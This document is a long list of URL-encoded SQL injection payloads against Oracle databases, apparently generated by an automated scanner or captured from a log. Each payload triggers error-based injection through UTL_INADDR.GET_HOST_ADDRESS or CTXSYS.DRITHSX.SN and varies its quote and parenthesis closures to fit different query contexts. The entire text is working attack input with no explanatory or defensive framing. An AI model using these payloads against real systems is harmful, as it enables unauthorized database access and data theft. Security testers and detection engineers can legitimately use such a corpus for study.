foo%29%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%288624%3D8624 foo%29%29%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%28%289387%3D9387 foo%29%29%29%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%28%28%282284%3D2284 foo%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29 foo%27%29%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%28%27EFwT%27%3D%27EFwT foo%27%29%29%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%28%28%27MdLG%27%3D%27MdLG foo%27%29%29%29%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%27UrgH%27%3D%27UrgH foo%27%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%27RVos%27%3D%27RVos foo%27%29%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%28%27WFuM%27%20LIKE%20%27WFuM foo%27%29%29%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%28%28%27STEp%27%20LIKE%20%27STEp foo%27%29%29%29%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%27metO%27%20LIKE%20%27metO foo%27%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%27GPGN%27%20LIKE%20%27GPGN foo%22%29%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%28%22OCCI%22%3D%22OCCI foo%22%29%29%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%28%28%22gSjd%22%3D%22gSjd foo%22%29%29%29%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%22muwO%22%3D%22muwO foo%22%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%22qaOj%22%3D%22qaOj foo%22%29%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%28%22dxrQ%22%20LIKE%20%22dxrQ foo%22%29%29%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%28%28%22Rjkf%22%20LIKE%20%22Rjkf foo%22%29%29%29%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%22ENiP%22%20LIKE%20%22ENiP foo%22%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20AND%20%22JeXZ%22%20LIKE%20%22JeXZ foo%29%20WHERE%204547%3D4547%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29 foo%27%29%20WHERE%205611%3D5611%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29 foo%27%20WHERE%203199%3D3199%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29 foo%22%20WHERE%202694%3D2694%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29 foo%27%20%7C%7C%20%28SELECT%208197%20FROM%20DUAL%20WHERE%206989%3D6989%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%205736%20WHERE%204787%3D4787%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%203284%20FROM%20DUAL%20WHERE%201411%3D1411%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20%29 foo%20%2B%20%28SELECT%203341%20WHERE%202214%3D2214%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20%29 foo%27%20%2B%20%28SELECT%20%27ydwC%27%20FROM%20DUAL%20WHERE%208279%3D8279%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27lXUX%27%20WHERE%207466%3D7466%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%207215%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287215%3D7215%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%20%23 foo%29%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29 foo%27%29%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29 foo%27%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29 foo%22%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29 foo%29%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%283542%3D3542 foo%29%29%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%28%288434%3D8434 foo%29%29%29%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%285640%3D5640 foo%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29 foo%27%29%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27ZlUc%27%3D%27ZlUc foo%27%29%29%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%27NmJr%27%3D%27NmJr foo%27%29%29%29%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%27CGnW%27%3D%27CGnW foo%27%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%27uJCC%27%3D%27uJCC foo%27%29%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27vdlE%27%20LIKE%20%27vdlE foo%27%29%29%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%27UDpY%27%20LIKE%20%27UDpY foo%27%29%29%29%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%27tNrh%27%20LIKE%20%27tNrh foo%27%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%27OTec%27%20LIKE%20%27OTec foo%22%29%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%28%22avEC%22%3D%22avEC foo%22%29%29%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%22YouM%22%3D%22YouM foo%22%29%29%29%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%22SmDW%22%3D%22SmDW foo%22%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%22nrFn%22%3D%22nrFn foo%22%29%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%28%22xHro%22%20LIKE%20%22xHro foo%22%29%29%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%22saeo%22%20LIKE%20%22saeo foo%22%29%29%29%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%22iWhp%22%20LIKE%20%22iWhp foo%22%20AND%202199%3DCTXSYS.DRITHSX.SN%282199%2C%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282199%3D2199%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%29%29%20AND%20%22vxOt%22%20LIKE%20%22vxOt 